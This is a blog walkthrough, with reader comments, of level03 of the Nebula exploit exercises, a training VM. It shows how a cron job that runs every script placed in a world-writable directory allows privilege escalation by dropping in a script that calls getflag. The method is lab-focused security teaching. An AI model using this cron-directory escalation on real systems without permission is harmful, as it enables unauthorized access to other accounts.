Nebula exploit exercises walkthrough – level03

level03

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

cron is a utility used to run tasks periodically, found in nearly every distro.

In /home/flag03, we have a script – writable.sh – and a directory – writable.d.

level03@nebula:/home/flag03$ ls -sl
total 1
0 drwxrwxrwx 1 flag03 flag03 40 2014-06-03 03:39 writable.d
1 -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh

Let’s take a look at writable.sh:

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

This is fairly simple – for each file in the writable.d directory, execute the scripts contained within, and then delete them. bash -x runs the script in a trace mode, to give you a bit more detail about when it is running. I think we can ignore ulimit -t 5 – it just limits the CPU time available to the shell, possibly to stop a malicious script consuming excess resources.

Note that the writable.d directory is world read/write – so we can just put a script in there:

level03@nebula:~$ cat getflag.sh 
#!/bin/sh

/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/

Then wait a short while, assuming that the writable.sh script is the one being run by cron…

level03@nebula:/tmp$ ls -sl
total 4
4 -rw-rw-r-- 1 flag03 flag03 59 2014-06-04 09:39 flag03.out
level03@nebula:/tmp$ cat flag03.out 
You have successfully executed getflag on a target account

Aside

Now – this is all well and good, but if we weren’t told that the script was run by cron, what could we do?

There is a root user in the Nebula VM, and using that I can do:

nebula@nebula:/var/spool/cron$ sudo crontab -u flag03 -l
*/3 * * * * /home/flag03/writable.sh

But I can’t do that as level03:

level03@nebula:/tmp$ crontab -u flag03 -l
must be privileged to use -u

Also, I could use ps to see that the process runs, but that would presume that I knew it was cron’ed anyway.

So, not sure how I would go about finding cron jobs as an unprivileged user.

I’ve asked on the Unix Stack Exchange.

7 thoughts on “Nebula exploit exercises walkthrough – level03

  1. Permalink  ⋅ Reply

    lollipoponlips

    October 16, 2016 at 9:18pm

    I’ve just started to do these exercises. I’m cofused:

    1) what is the objective exactly?

  2. […] the cleanest, but it works to get the flag. I had the same thought as Cybergibbons though, (see this article) and from what I see of his findings, the only way to detect cronjobs if you don’t have […]

  3. Permalink  ⋅ Reply

    Shinko

    May 6, 2017 at 12:47am

    For fun, I decided to try and one-Liner it:
    echo -e ‘#!/usr/bin/bashnn/bin/getflag>/home/flag03/got_result.txtn’>/home/flag03/writable.d/get_flag.sh;chmod +x /home/flag03/writable.d/get_flag.sh

  4. Permalink  ⋅ Reply

    emily

    November 18, 2017 at 12:30am

    level03@nebula:~$ cat getfile.sh
    level03@nebula:~$ cat: getflag.sh: No such file or directory

    ??

  5. Permalink  ⋅ Reply

    emily

    November 18, 2017 at 12:32am

    level03@nebula:~$ cat getflag.sh
    level03@nebula:~$ cat: getflag.sh: No such file or directory.

    What am I doing wrong?

    • Permalink  ⋅ Reply

      evan

      December 27, 2017 at 5:23pm

      did you create the getflag.sh script and is it located in your home directory?

    • Permalink  ⋅ Reply

      manuelh

      March 29, 2018 at 7:56pm

      Try the following:
      level03@nebula:~$ cat > getflag.sh
      #!/bin/sh

      /bin/getflag >> /tmp/flag03.out

      level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/

Leave a Reply to manuelh Cancel reply

Your email will not be published. Name and Email fields are required.

This site uses Akismet to reduce spam. Learn how your comment data is processed.